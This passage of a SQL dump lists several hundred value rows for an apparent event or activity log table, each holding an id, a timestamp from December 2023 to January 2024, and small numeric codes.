(8608, '2023-12-12 20:10:11', 1, 2060, 0, 1, 1),
(8609, '2023-12-12 23:57:50', 1, 2053, 0, 1, 1),
(8610, '2023-12-13 01:24:06', 1, 2053, 0, 1, 1),
(8611, '2023-12-13 02:31:54', 1, 2054, 0, 1, 1),
(8612, '2023-12-13 03:07:54', 1, 2059, 0, 1, 1),
(8613, '2023-12-13 03:34:43', 1, 2060, 0, 1, 1),
(8614, '2023-12-13 05:07:29', 1, 2063, 0, 1, 1),
(8615, '2023-12-13 07:37:27', 1, 2053, 0, 1, 1),
(8616, '2023-12-13 07:40:30', 1, 2064, 0, 1, 1),
(8617, '2023-12-13 13:02:33', 1, 2054, 0, 1, 1),
(8618, '2023-12-13 14:54:37', 1, 2064, 0, 1, 1),
(8619, '2023-12-13 15:36:03', 1, 2064, 0, 1, 1),
(8620, '2023-12-13 15:48:49', 1, 2054, 0, 1, 1),
(8621, '2023-12-13 15:49:03', 1, 2058, 0, 1, 1),
(8622, '2023-12-13 15:49:12', 1, 2064, 0, 1, 1),
(8623, '2023-12-13 15:49:36', 1, 2059, 0, 1, 1),
(8624, '2023-12-13 15:50:20', 1, 2060, 0, 1, 1),
(8625, '2023-12-13 15:50:27', 1, 2053, 0, 1, 1),
(8626, '2023-12-13 16:09:52', 1, 2053, 0, 1, 1),
(8627, '2023-12-13 19:05:49', 1, 2063, 0, 1, 1),
(8628, '2023-12-13 19:06:52', 1, 2060, 0, 1, 1),
(8629, '2023-12-13 20:45:18', 1, 2064, 0, 1, 1),
(8630, '2023-12-13 20:45:24', 1, 2062, 0, 1, 1),
(8631, '2023-12-14 00:34:50', 1, 2064, 0, 1, 1),
(8632, '2023-12-14 00:39:15', 1, 2054, 0, 1, 1),
(8633, '2023-12-14 00:54:51', 1, 2053, 0, 1, 1),
(8634, '2023-12-14 02:14:46', 1, 2063, 0, 1, 1),
(8635, '2023-12-14 03:04:46', 1, 2063, 0, 1, 1),
(8636, '2023-12-14 03:07:53', 1, 2060, 0, 1, 1),
(8637, '2023-12-14 07:00:27', 1, 2059, 0, 1, 1),
(8638, '2023-12-14 07:00:28', 1, 2059, 0, 1, 1),
(8639, '2023-12-14 07:35:16', 1, 2054, 0, 1, 1),
(8640, '2023-12-14 12:02:55', 1, 2054, 0, 1, 1),
(8641, '2023-12-14 12:02:56', 1, 2055, 0, 1, 1),
(8642, '2023-12-14 12:02:57', 1, 2059, 0, 1, 1),
(8643, '2023-12-14 12:02:58', 1, 2060, 0, 1, 1),
(8644, '2023-12-14 12:02:58', 1, 2061, 0, 1, 1),
(8645, '2023-12-14 12:02:59', 1, 2062, 0, 1, 1),
(8646, '2023-12-14 12:03:00', 1, 2058, 0, 1, 1),
(8647, '2023-12-14 12:03:01', 1, 2063, 0, 1, 1),
(8648, '2023-12-14 12:03:02', 1, 2064, 0, 1, 1),
(8649, '2023-12-14 12:03:11', 1, 2053, 0, 1, 1),
(8650, '2023-12-14 12:28:32', 1, 2063, 0, 1, 1),
(8651, '2023-12-14 12:35:54', 1, 2064, 0, 1, 1),
(8652, '2023-12-14 13:05:44', 1, 2060, 0, 1, 1),
(8653, '2023-12-14 15:35:42', 1, 2053, 0, 1, 1),
(8654, '2023-12-14 16:05:29', 1, 2054, 0, 1, 1),
(8655, '2023-12-14 17:02:05', 1, 2063, 0, 1, 1),
(8656, '2023-12-14 21:02:40', 1, 2060, 0, 1, 1),
(8657, '2023-12-15 00:38:16', 1, 2064, 0, 1, 1),
(8658, '2023-12-15 00:39:47', 1, 2053, 0, 1, 1),
(8659, '2023-12-15 00:42:06', 1, 2055, 0, 1, 1),
(8660, '2023-12-15 01:07:18', 1, 2064, 0, 1, 1),
(8661, '2023-12-15 01:07:38', 1, 2054, 0, 1, 1),
(8662, '2023-12-15 01:37:55', 1, 2060, 0, 1, 1),
(8663, '2023-12-15 01:37:56', 1, 2061, 0, 1, 1),
(8664, '2023-12-15 01:38:26', 1, 2055, 0, 1, 1),
(8665, '2023-12-15 02:38:45', 1, 2055, 0, 1, 1),
(8666, '2023-12-15 07:14:35', 1, 2060, 0, 1, 1),
(8667, '2023-12-15 07:26:52', 1, 2063, 0, 1, 1),
(8668, '2023-12-15 07:59:24', 1, 2058, 0, 1, 1),
(8669, '2023-12-15 08:59:14', 1, 2055, 0, 1, 1),
(8670, '2023-12-15 10:36:04', 1, 2059, 0, 1, 1),
(8671, '2023-12-15 10:42:40', 1, 2061, 0, 1, 1),
(8672, '2023-12-15 11:34:48', 1, 2062, 0, 1, 1),
(8673, '2023-12-15 13:06:17', 1, 2061, 0, 1, 1),
(8674, '2023-12-15 13:06:39', 1, 2064, 0, 1, 1),
(8675, '2023-12-15 13:10:11', 1, 2053, 0, 1, 1),
(8676, '2023-12-15 13:10:45', 1, 2054, 0, 1, 1),
(8677, '2023-12-15 13:31:05', 1, 2059, 0, 1, 1),
(8678, '2023-12-15 13:36:38', 1, 2061, 0, 1, 1),
(8679, '2023-12-15 13:48:16', 1, 2064, 0, 1, 1),
(8680, '2023-12-15 15:09:33', 1, 2060, 0, 1, 1),
(8681, '2023-12-15 15:09:38', 4, 2060, 1479, 1, 1),
(8682, '2023-12-15 16:08:57', 1, 2054, 0, 1, 1),
(8683, '2023-12-16 00:39:13', 1, 2054, 0, 1, 1),
(8684, '2023-12-16 01:07:27', 1, 2064, 0, 1, 1),
(8685, '2023-12-16 01:07:30', 1, 2055, 0, 1, 1),
(8686, '2023-12-16 01:10:17', 1, 2053, 0, 1, 1),
(8687, '2023-12-16 01:19:10', 1, 2060, 0, 1, 1),
(8688, '2023-12-16 01:30:21', 1, 2063, 0, 1, 1),
(8689, '2023-12-16 01:59:02', 1, 2058, 0, 1, 1),
(8690, '2023-12-16 02:51:38', 1, 2055, 0, 1, 1),
(8691, '2023-12-16 04:35:15', 1, 2061, 0, 1, 1),
(8692, '2023-12-16 05:26:22', 1, 2062, 0, 1, 1),
(8693, '2023-12-16 05:44:44', 1, 2061, 0, 1, 1),
(8694, '2023-12-16 07:01:24', 1, 2054, 0, 1, 1),
(8695, '2023-12-16 07:21:25', 1, 2059, 0, 1, 1),
(8696, '2023-12-16 07:38:00', 1, 2064, 0, 1, 1),
(8697, '2023-12-16 10:07:55', 1, 2063, 0, 1, 1),
(8698, '2023-12-16 10:35:58', 1, 2063, 0, 1, 1),
(8699, '2023-12-16 12:36:59', 1, 2054, 0, 1, 1),
(8700, '2023-12-16 12:52:08', 1, 2061, 0, 1, 1),
(8701, '2023-12-16 13:08:21', 1, 2064, 0, 1, 1),
(8702, '2023-12-16 13:09:59', 1, 2061, 0, 1, 1),
(8703, '2023-12-16 14:00:41', 1, 2059, 0, 1, 1),
(8704, '2023-12-16 14:29:17', 1, 2061, 0, 1, 1),
(8705, '2023-12-16 14:43:21', 1, 2061, 0, 1, 1),
(8706, '2023-12-16 18:54:50', 1, 2063, 0, 1, 1),
(8707, '2023-12-16 18:54:54', 1, 2063, 0, 1, 1),
(8708, '2023-12-16 19:24:12', 1, 2054, 0, 1, 1),
(8709, '2023-12-16 19:41:04', 1, 2053, 0, 1, 1),
(8710, '2023-12-17 01:09:14', 1, 2054, 0, 1, 1),
(8711, '2023-12-17 02:08:33', 1, 2055, 0, 1, 1),
(8712, '2023-12-17 02:50:27', 1, 2064, 0, 1, 1),
(8713, '2023-12-17 03:37:03', 1, 2058, 0, 1, 1),
(8714, '2023-12-17 05:07:49', 1, 2055, 0, 1, 1),
(8715, '2023-12-17 05:59:52', 1, 2061, 0, 1, 1),
(8716, '2023-12-17 05:59:54', 1, 2061, 0, 1, 1),
(8717, '2023-12-17 06:43:57', 1, 2053, 0, 1, 1),
(8718, '2023-12-17 12:40:39', 1, 2064, 0, 1, 1),
(8719, '2023-12-17 13:09:54', 1, 2054, 0, 1, 1),
(8720, '2023-12-17 13:40:33', 1, 2058, 0, 1, 1),
(8721, '2023-12-17 15:34:21', 1, 2053, 0, 1, 1),
(8722, '2023-12-17 15:39:04', 1, 2062, 0, 1, 1),
(8723, '2023-12-17 16:09:24', 1, 2059, 0, 1, 1),
(8724, '2023-12-17 17:45:10', 1, 2062, 0, 1, 1),
(8725, '2023-12-17 18:10:46', 1, 2062, 0, 1, 1),
(8726, '2023-12-17 18:18:02', 1, 2060, 0, 1, 1),
(8727, '2023-12-18 05:32:49', 1, 2063, 0, 1, 1),
(8728, '2023-12-18 08:41:46', 1, 2054, 0, 1, 1),
(8729, '2023-12-18 10:56:33', 1, 2063, 0, 1, 1),
(8730, '2023-12-18 10:56:36', 1, 2064, 0, 1, 1),
(8731, '2023-12-18 10:56:38', 1, 2064, 0, 1, 1),
(8732, '2023-12-18 10:57:25', 1, 2063, 0, 1, 1),
(8733, '2023-12-18 11:02:07', 1, 2064, 0, 1, 1),
(8734, '2023-12-18 14:19:59', 1, 2059, 0, 1, 1),
(8735, '2023-12-18 14:55:29', 1, 2061, 0, 1, 1),
(8736, '2023-12-18 14:55:30', 1, 2061, 0, 1, 1),
(8737, '2023-12-18 14:55:35', 1, 2061, 0, 1, 1),
(8738, '2023-12-18 15:19:07', 1, 2059, 0, 1, 1),
(8739, '2023-12-18 19:18:17', 1, 2064, 0, 1, 1),
(8740, '2023-12-18 20:02:45', 1, 2054, 0, 1, 1),
(8741, '2023-12-19 00:50:44', 1, 2062, 0, 1, 1),
(8742, '2023-12-19 01:10:13', 1, 2059, 0, 1, 1),
(8743, '2023-12-19 01:37:26', 1, 2059, 0, 1, 1),
(8744, '2023-12-19 01:40:22', 1, 2053, 0, 1, 1),
(8745, '2023-12-19 03:20:12', 1, 2064, 0, 1, 1),
(8746, '2023-12-19 04:09:58', 1, 2054, 0, 1, 1),
(8747, '2023-12-19 05:11:49', 1, 2060, 0, 1, 1),
(8748, '2023-12-19 05:47:08', 1, 2064, 0, 1, 1),
(8749, '2023-12-19 09:55:21', 1, 2058, 0, 1, 1),
(8750, '2023-12-19 09:58:25', 1, 2063, 0, 1, 1),
(8751, '2023-12-19 09:58:31', 4, 2063, 1519, 1, 1),
(8752, '2023-12-19 13:09:05', 1, 2053, 0, 1, 1),
(8753, '2023-12-19 13:09:11', 1, 2064, 0, 1, 1),
(8754, '2023-12-19 13:10:14', 1, 2060, 0, 1, 1),
(8755, '2023-12-19 13:39:40', 1, 2054, 0, 1, 1),
(8756, '2023-12-19 13:39:48', 1, 2058, 0, 1, 1),
(8757, '2023-12-19 14:08:46', 1, 2059, 0, 1, 1),
(8758, '2023-12-19 14:40:13', 1, 2054, 0, 1, 1),
(8759, '2023-12-19 16:13:06', 1, 2061, 0, 1, 1),
(8760, '2023-12-19 18:06:57', 1, 2058, 0, 1, 1),
(8761, '2023-12-20 01:45:24', 1, 2064, 0, 1, 1),
(8762, '2023-12-20 01:45:47', 1, 2063, 0, 1, 1),
(8763, '2023-12-20 02:38:31', 1, 2061, 0, 1, 1),
(8764, '2023-12-20 02:48:01', 1, 2053, 0, 1, 1),
(8765, '2023-12-20 03:51:52', 1, 2059, 0, 1, 1),
(8766, '2023-12-20 05:08:19', 1, 2054, 0, 1, 1),
(8767, '2023-12-20 05:29:13', 1, 2058, 0, 1, 1),
(8768, '2023-12-20 13:20:24', 1, 2053, 0, 1, 1),
(8769, '2023-12-20 14:07:50', 1, 2064, 0, 1, 1),
(8770, '2023-12-20 14:59:27', 1, 2063, 0, 1, 1),
(8771, '2023-12-20 17:12:33', 1, 2054, 0, 1, 1),
(8772, '2023-12-20 17:28:02', 1, 2058, 0, 1, 1),
(8773, '2023-12-20 17:28:43', 1, 2061, 0, 1, 1),
(8774, '2023-12-20 18:10:23', 1, 2062, 0, 1, 1),
(8775, '2023-12-20 18:11:58', 1, 2064, 0, 1, 1),
(8776, '2023-12-20 18:11:58', 1, 2062, 0, 1, 1),
(8777, '2023-12-20 18:11:59', 1, 2063, 0, 1, 1),
(8778, '2023-12-20 18:12:07', 1, 2064, 0, 1, 1),
(8779, '2023-12-20 18:20:08', 1, 2062, 0, 1, 1),
(8780, '2023-12-20 18:26:29', 1, 2063, 0, 1, 1),
(8781, '2023-12-20 18:27:21', 1, 2064, 0, 1, 1),
(8782, '2023-12-20 18:38:31', 1, 2064, 0, 1, 1),
(8783, '2023-12-20 18:39:00', 1, 2055, 0, 1, 1),
(8784, '2023-12-20 18:40:19', 1, 2054, 0, 1, 1),
(8785, '2023-12-21 00:48:02', 1, 2053, 0, 1, 1),
(8786, '2023-12-21 01:17:41', 1, 2064, 0, 1, 1),
(8787, '2023-12-21 03:38:22', 1, 2063, 0, 1, 1),
(8788, '2023-12-21 06:18:11', 1, 2054, 0, 1, 1),
(8789, '2023-12-21 08:42:15', 1, 2053, 0, 1, 1),
(8790, '2023-12-21 08:44:46', 1, 2059, 0, 1, 1),
(8791, '2023-12-21 14:13:52', 1, 2064, 0, 1, 1),
(8792, '2023-12-21 15:27:58', 1, 2054, 0, 1, 1),
(8793, '2023-12-21 19:11:41', 1, 2053, 0, 1, 1),
(8794, '2023-12-21 23:51:01', 1, 2059, 0, 1, 1),
(8795, '2023-12-22 02:23:56', 1, 2064, 0, 1, 1),
(8796, '2023-12-22 03:09:21', 1, 2054, 0, 1, 1),
(8797, '2023-12-22 04:11:36', 1, 2059, 0, 1, 1),
(8798, '2023-12-22 04:12:04', 1, 2053, 0, 1, 1),
(8799, '2023-12-22 05:53:24', 1, 2055, 0, 1, 1),
(8800, '2023-12-22 15:41:43', 1, 2064, 0, 1, 1),
(8801, '2023-12-22 15:58:07', 1, 2054, 0, 1, 1),
(8802, '2023-12-22 16:06:12', 1, 2053, 0, 1, 1),
(8803, '2023-12-22 16:55:02', 1, 2055, 0, 1, 1),
(8804, '2023-12-22 17:17:30', 1, 2061, 0, 1, 1),
(8805, '2023-12-22 17:17:32', 1, 2061, 0, 1, 1),
(8806, '2023-12-22 17:17:32', 1, 2061, 0, 1, 1),
(8807, '2023-12-22 17:45:56', 1, 2060, 0, 1, 1),
(8808, '2023-12-23 01:11:48', 1, 2055, 0, 1, 1),
(8809, '2023-12-23 01:58:08', 1, 2062, 0, 1, 1),
(8810, '2023-12-23 02:41:47', 1, 2064, 0, 1, 1),
(8811, '2023-12-23 04:01:33', 1, 2054, 0, 1, 1),
(8812, '2023-12-23 04:18:13', 1, 2053, 0, 1, 1),
(8813, '2023-12-23 07:22:40', 1, 2054, 0, 1, 1),
(8814, '2023-12-23 12:44:11', 1, 2062, 0, 1, 1),
(8815, '2023-12-23 13:26:56', 1, 2053, 0, 1, 1),
(8816, '2023-12-23 14:07:58', 1, 2064, 0, 1, 1),
(8817, '2023-12-23 14:07:58', 1, 2062, 0, 1, 1),
(8818, '2023-12-23 14:07:58', 1, 2061, 0, 1, 1),
(8819, '2023-12-23 14:07:58', 1, 2059, 0, 1, 1),
(8820, '2023-12-23 14:07:58', 1, 2063, 0, 1, 1),
(8821, '2023-12-23 14:07:58', 1, 2055, 0, 1, 1),
(8822, '2023-12-23 14:07:58', 1, 2058, 0, 1, 1),
(8823, '2023-12-23 14:07:58', 1, 2054, 0, 1, 1),
(8824, '2023-12-23 14:07:59', 1, 2060, 0, 1, 1),
(8825, '2023-12-23 16:50:17', 1, 2064, 0, 1, 1),
(8826, '2023-12-23 18:47:03', 1, 2054, 0, 1, 1),
(8827, '2023-12-24 02:55:57', 1, 2063, 0, 1, 1),
(8828, '2023-12-24 02:55:59', 1, 2063, 0, 1, 1),
(8829, '2023-12-24 03:19:08', 1, 2060, 0, 1, 1),
(8830, '2023-12-24 03:34:07', 1, 2064, 0, 1, 1),
(8831, '2023-12-24 04:05:37', 1, 2063, 0, 1, 1),
(8832, '2023-12-24 05:04:39', 1, 2063, 0, 1, 1),
(8833, '2023-12-24 05:38:40', 1, 2060, 0, 1, 1),
(8834, '2023-12-24 05:57:45', 1, 2060, 0, 1, 1),
(8835, '2023-12-24 06:11:41', 1, 2063, 0, 1, 1),
(8836, '2023-12-24 08:24:35', 1, 2053, 0, 1, 1),
(8837, '2023-12-24 14:08:46', 1, 2064, 0, 1, 1),
(8838, '2023-12-24 15:19:08', 1, 2062, 0, 1, 1),
(8839, '2023-12-24 17:44:16', 1, 2053, 0, 1, 1),
(8840, '2023-12-24 18:33:09', 1, 2060, 0, 1, 1),
(8841, '2023-12-24 18:42:41', 1, 2063, 0, 1, 1),
(8842, '2023-12-24 18:52:08', 1, 2054, 0, 1, 1),
(8843, '2023-12-24 19:08:05', 1, 2058, 0, 1, 1),
(8844, '2023-12-24 19:50:09', 1, 2055, 0, 1, 1),
(8845, '2023-12-24 21:10:35', 1, 2061, 0, 1, 1),
(8846, '2023-12-24 22:03:10', 1, 2062, 0, 1, 1),
(8847, '2023-12-24 23:12:30', 1, 2060, 0, 1, 1),
(8848, '2023-12-24 23:21:44', 1, 2063, 0, 1, 1),
(8849, '2023-12-24 23:45:27', 1, 2058, 0, 1, 1),
(8850, '2023-12-25 00:25:20', 1, 2055, 0, 1, 1),
(8851, '2023-12-25 01:21:35', 1, 2064, 0, 1, 1),
(8852, '2023-12-25 01:31:45', 1, 2061, 0, 1, 1),
(8853, '2023-12-25 02:14:53', 1, 2062, 0, 1, 1),
(8854, '2023-12-25 03:51:49', 1, 2054, 0, 1, 1),
(8855, '2023-12-25 04:14:38', 1, 2059, 0, 1, 1),
(8856, '2023-12-25 04:31:06', 1, 2064, 0, 1, 1),
(8857, '2023-12-25 05:47:31', 1, 2053, 0, 1, 1),
(8858, '2023-12-25 06:22:08', 1, 2054, 0, 1, 1),
(8859, '2023-12-25 07:49:24', 1, 2064, 0, 1, 1),
(8860, '2023-12-25 07:54:20', 1, 2060, 0, 1, 1),
(8861, '2023-12-25 08:03:38', 1, 2063, 0, 1, 1),
(8862, '2023-12-25 08:27:59', 1, 2058, 0, 1, 1),
(8863, '2023-12-25 09:09:24', 1, 2055, 0, 1, 1),
(8864, '2023-12-25 10:14:04', 1, 2061, 0, 1, 1),
(8865, '2023-12-25 10:55:58', 1, 2062, 0, 1, 1),
(8866, '2023-12-25 12:18:03', 1, 2054, 0, 1, 1),
(8867, '2023-12-25 12:35:30', 1, 2059, 0, 1, 1),
(8868, '2023-12-25 12:49:02', 1, 2064, 0, 1, 1),
(8869, '2023-12-25 14:01:07', 1, 2060, 0, 1, 1),
(8870, '2023-12-25 14:49:20', 1, 2053, 0, 1, 1),
(8871, '2023-12-25 17:16:22', 1, 2062, 0, 1, 1),
(8872, '2023-12-25 17:43:18', 1, 2062, 0, 1, 1),
(8873, '2023-12-25 17:59:24', 1, 2054, 0, 1, 1),
(8874, '2023-12-25 18:49:54', 1, 2060, 0, 1, 1),
(8875, '2023-12-25 18:59:34', 1, 2063, 0, 1, 1),
(8876, '2023-12-25 19:24:48', 1, 2058, 0, 1, 1),
(8877, '2023-12-25 20:05:29', 1, 2055, 0, 1, 1),
(8878, '2023-12-25 20:06:52', 1, 2064, 0, 1, 1),
(8879, '2023-12-25 21:10:52', 1, 2061, 0, 1, 1),
(8880, '2023-12-25 21:53:03', 1, 2062, 0, 1, 1),
(8881, '2023-12-25 23:16:49', 1, 2054, 0, 1, 1),
(8882, '2023-12-25 23:34:55', 1, 2059, 0, 1, 1),
(8883, '2023-12-25 23:49:11', 1, 2064, 0, 1, 1),
(8884, '2023-12-26 03:34:30', 1, 2055, 0, 1, 1),
(8885, '2023-12-26 04:23:27', 1, 2053, 0, 1, 1),
(8886, '2023-12-26 04:44:35', 1, 2055, 0, 1, 1),
(8887, '2023-12-26 07:28:10', 1, 2064, 0, 1, 1),
(8888, '2023-12-26 08:36:16', 1, 2058, 0, 1, 1),
(8889, '2023-12-26 13:15:54', 1, 2054, 0, 1, 1),
(8890, '2023-12-26 16:54:42', 1, 2061, 0, 1, 1),
(8891, '2023-12-26 17:47:37', 1, 2053, 0, 1, 1),
(8892, '2023-12-26 22:26:07', 1, 2063, 0, 1, 1),
(8893, '2023-12-27 01:17:25', 1, 2054, 0, 1, 1),
(8894, '2023-12-27 01:26:42', 1, 2059, 0, 1, 1),
(8895, '2023-12-27 01:59:56', 1, 2064, 0, 1, 1),
(8896, '2023-12-27 02:17:56', 1, 2055, 0, 1, 1),
(8897, '2023-12-27 03:29:53', 1, 2054, 0, 1, 1),
(8898, '2023-12-27 04:42:55', 1, 2055, 0, 1, 1),
(8899, '2023-12-27 04:47:13', 1, 2053, 0, 1, 1),
(8900, '2023-12-27 04:58:23', 1, 2062, 0, 1, 1),
(8901, '2023-12-27 09:57:57', 1, 2061, 0, 1, 1),
(8902, '2023-12-27 13:07:46', 1, 2053, 0, 1, 1),
(8903, '2023-12-27 13:16:26', 1, 2055, 0, 1, 1),
(8904, '2023-12-27 14:52:05', 1, 2055, 0, 1, 1),
(8905, '2023-12-27 15:16:01', 1, 2061, 0, 1, 1),
(8906, '2023-12-27 15:39:08', 1, 2058, 0, 1, 1),
(8907, '2023-12-27 18:27:30', 1, 2059, 0, 1, 1),
(8908, '2023-12-28 00:01:25', 1, 2054, 0, 1, 1),
(8909, '2023-12-28 04:45:25', 1, 2053, 0, 1, 1),
(8910, '2023-12-28 10:59:28', 1, 2063, 0, 1, 1),
(8911, '2023-12-28 12:22:36', 1, 2063, 0, 1, 1),
(8912, '2023-12-28 15:58:41', 1, 2062, 0, 1, 1),
(8913, '2023-12-28 20:59:26', 1, 2060, 0, 1, 1),
(8914, '2023-12-29 03:41:49', 1, 2061, 0, 1, 1),
(8915, '2023-12-29 04:53:15', 1, 2053, 0, 1, 1),
(8916, '2023-12-29 05:25:36', 1, 2060, 0, 1, 1),
(8917, '2023-12-29 08:29:45', 1, 2054, 0, 1, 1),
(8918, '2023-12-30 01:05:19', 1, 2059, 0, 1, 1),
(8919, '2023-12-30 01:05:23', 1, 2059, 0, 1, 1),
(8920, '2023-12-30 04:41:40', 1, 2064, 0, 1, 1),
(8921, '2023-12-30 05:17:15', 1, 2053, 0, 1, 1),
(8922, '2023-12-30 13:04:41', 1, 2063, 0, 1, 1),
(8923, '2023-12-30 13:08:40', 1, 2062, 0, 1, 1),
(8924, '2023-12-30 13:08:56', 1, 2062, 0, 1, 1),
(8925, '2023-12-30 14:55:57', 1, 2062, 0, 1, 1),
(8926, '2023-12-30 17:14:11', 1, 2061, 0, 1, 1),
(8927, '2023-12-30 17:41:05', 1, 2058, 0, 1, 1),
(8928, '2023-12-30 17:41:22', 1, 2058, 0, 1, 1),
(8929, '2023-12-31 05:43:24', 1, 2064, 0, 1, 1),
(8930, '2023-12-31 07:33:56', 1, 2064, 0, 1, 1),
(8931, '2023-12-31 11:08:47', 1, 2058, 0, 1, 1),
(8932, '2023-12-31 12:57:05', 1, 2060, 0, 1, 1),
(8933, '2023-12-31 13:32:22', 1, 2055, 0, 1, 1),
(8934, '2023-12-31 16:20:27', 1, 2053, 0, 1, 1),
(8935, '2023-12-31 16:37:23', 1, 2060, 0, 1, 1),
(8936, '2023-12-31 16:44:40', 1, 2054, 0, 1, 1),
(8937, '2023-12-31 16:45:21', 1, 2060, 0, 1, 1),
(8938, '2023-12-31 16:54:02', 4, 2061, 1612, 1, 1),
(8939, '2023-12-31 16:54:11', 1, 2061, 0, 1, 1),
(8940, '2023-12-31 16:54:16', 4, 2061, 1613, 1, 1),
(8941, '2023-12-31 16:54:27', 4, 2061, 1614, 1, 1),
(8942, '2023-12-31 16:54:40', 4, 2064, 1615, 1, 1),
(8943, '2023-12-31 16:54:55', 4, 2064, 1616, 1, 1),
(8944, '2023-12-31 18:23:49', 1, 2055, 0, 1, 1),
(8945, '2023-12-31 20:50:42', 1, 2053, 0, 1, 1),
(8946, '2023-12-31 22:09:23', 1, 2063, 0, 1, 1),
(8947, '2023-12-31 22:09:23', 1, 2063, 0, 1, 1),
(8948, '2023-12-31 23:13:12', 1, 2059, 0, 1, 1),
(8949, '2024-01-01 02:07:52', 1, 2060, 0, 1, 1),
(8950, '2024-01-01 02:13:51', 1, 2062, 0, 1, 1),
(8951, '2024-01-01 05:14:19', 1, 2064, 0, 1, 1),
(8952, '2024-01-01 07:22:22', 1, 2054, 0, 1, 1),
(8953, '2024-01-01 09:34:37', 1, 2061, 0, 1, 1),
(8954, '2024-01-01 13:37:42', 1, 2059, 0, 1, 1),
(8955, '2024-01-01 14:49:02', 1, 2055, 0, 1, 1),
(8956, '2024-01-01 15:19:33', 1, 2058, 0, 1, 1),
(8957, '2024-01-01 16:23:22', 1, 2055, 0, 1, 1),
(8958, '2024-01-01 16:26:16', 1, 2053, 0, 1, 1),
(8959, '2024-01-01 17:35:38', 1, 2054, 0, 1, 1),
(8960, '2024-01-01 17:53:35', 1, 2054, 0, 1, 1),
(8961, '2024-01-01 18:30:13', 1, 2062, 0, 1, 1),
(8962, '2024-01-02 02:17:15', 1, 2061, 0, 1, 1),
(8963, '2024-01-02 04:35:41', 1, 2058, 0, 1, 1),
(8964, '2024-01-02 05:20:07', 1, 2053, 0, 1, 1),
(8965, '2024-01-02 05:23:31', 1, 2064, 0, 1, 1),
(8966, '2024-01-02 05:25:56', 1, 2059, 0, 1, 1),
(8967, '2024-01-02 05:57:05', 1, 2054, 0, 1, 1),
(8968, '2024-01-02 06:04:57', 1, 2055, 0, 1, 1),
(8969, '2024-01-02 06:17:21', 1, 2055, 0, 1, 1),
(8970, '2024-01-02 07:16:53', 1, 2064, 0, 1, 1),
(8971, '2024-01-02 07:21:23', 1, 2055, 0, 1, 1),
(8972, '2024-01-02 07:27:26', 1, 2061, 0, 1, 1),
(8973, '2024-01-02 13:54:19', 1, 2064, 0, 1, 1),
(8974, '2024-01-02 13:56:25', 1, 2053, 0, 1, 1),
(8975, '2024-01-02 16:03:29', 1, 2054, 0, 1, 1),
(8976, '2024-01-02 18:20:06', 1, 2054, 0, 1, 1),
(8977, '2024-01-02 21:05:23', 1, 2060, 0, 1, 1),
(8978, '2024-01-03 06:31:02', 1, 2064, 0, 1, 1),
(8979, '2024-01-03 09:27:22', 1, 2064, 0, 1, 1),
(8980, '2024-01-03 09:31:43', 1, 2061, 0, 1, 1),
(8981, '2024-01-03 11:34:36', 1, 2060, 0, 1, 1),
(8982, '2024-01-03 11:46:33', 1, 2063, 0, 1, 1),
(8983, '2024-01-03 12:16:51', 1, 2058, 0, 1, 1),
(8984, '2024-01-03 13:12:02', 1, 2055, 0, 1, 1),
(8985, '2024-01-03 13:13:49', 1, 2055, 0, 1, 1),
(8986, '2024-01-03 14:38:29', 1, 2061, 0, 1, 1),
(8987, '2024-01-03 14:55:23', 1, 2061, 0, 1, 1),
(8988, '2024-01-03 14:55:28', 1, 2061, 1638, 1, 1),
(8989, '2024-01-03 14:56:45', 1, 2061, 0, 1, 1),
(8990, '2024-01-03 15:23:33', 1, 2062, 0, 1, 1),
(8991, '2024-01-03 17:10:45', 1, 2060, 0, 1, 1),
(8992, '2024-01-03 17:12:44', 1, 2064, 0, 1, 1),
(8993, '2024-01-03 17:22:54', 1, 2063, 0, 1, 1),
(8994, '2024-01-03 17:53:25', 1, 2058, 0, 1, 1),
(8995, '2024-01-03 18:16:37', 1, 2053, 0, 1, 1),
(8996, '2024-01-03 18:49:21', 1, 2055, 0, 1, 1),
(8997, '2024-01-03 20:39:23', 1, 2060, 0, 1, 1),
(8998, '2024-01-03 20:51:40', 1, 2063, 0, 1, 1),
(8999, '2024-01-03 21:22:07', 1, 2058, 0, 1, 1),
(9000, '2024-01-03 22:21:33', 1, 2055, 0, 1, 1),
(9001, '2024-01-03 23:46:04', 1, 2061, 0, 1, 1),
(9002, '2024-01-04 00:31:50', 1, 2062, 0, 1, 1),
(9003, '2024-01-04 01:54:09', 1, 2054, 0, 1, 1),
(9004, '2024-01-04 02:11:03', 1, 2059, 0, 1, 1),
(9005, '2024-01-04 02:26:07', 1, 2064, 0, 1, 1),
(9006, '2024-01-04 04:17:01', 1, 2055, 0, 1, 1),
(9007, '2024-01-04 04:52:33', 1, 2053, 0, 1, 1),
(9008, '2024-01-04 05:02:39', 1, 2054, 0, 1, 1),
(9009, '2024-01-04 05:26:02', 1, 2064, 0, 1, 1),
(9010, '2024-01-04 07:14:07', 1, 2060, 0, 1, 1),
(9011, '2024-01-04 07:31:55', 1, 2063, 0, 1, 1),
(9012, '2024-01-04 08:16:44', 1, 2058, 0, 1, 1),
(9013, '2024-01-04 09:39:47', 1, 2055, 0, 1, 1),
(9014, '2024-01-04 10:32:13', 1, 2059, 0, 1, 1),
(9015, '2024-01-04 11:53:36', 1, 2061, 0, 1, 1),
(9016, '2024-01-04 12:14:18', 1, 2062, 0, 1, 1),
(9017, '2024-01-04 13:02:41', 1, 2062, 0, 1, 1),
(9018, '2024-01-04 14:25:39', 1, 2054, 0, 1, 1),
(9019, '2024-01-04 15:08:50', 1, 2054, 0, 1, 1),
(9020, '2024-01-04 15:17:38', 1, 2054, 0, 1, 1),
(9021, '2024-01-04 15:23:02', 1, 2053, 0, 1, 1),
(9022, '2024-01-04 15:34:08', 1, 2059, 0, 1, 1),
(9023, '2024-01-04 15:55:36', 1, 2064, 0, 1, 1),
(9024, '2024-01-04 16:55:14', 1, 2054, 0, 1, 1),
(9025, '2024-01-04 21:20:26', 1, 2063, 0, 1, 1),
(9026, '2024-01-04 22:17:56', 1, 2063, 0, 1, 1),
(9027, '2024-01-04 23:05:44', 1, 2054, 0, 1, 1),
(9028, '2024-01-05 04:01:21', 1, 2053, 0, 1, 1),
(9029, '2024-01-05 04:56:36', 1, 2054, 0, 1, 1),
(9030, '2024-01-05 05:09:12', 1, 2061, 0, 1, 1),
(9031, '2024-01-05 07:18:20', 1, 2060, 0, 1, 1),
(9032, '2024-01-05 09:43:24', 1, 2063, 0, 1, 1),
(9033, '2024-01-05 09:43:42', 1, 2063, 0, 1, 1),
(9034, '2024-01-05 16:24:32', 1, 2053, 0, 1, 1),
(9035, '2024-01-05 18:23:53', 1, 2054, 0, 1, 1),
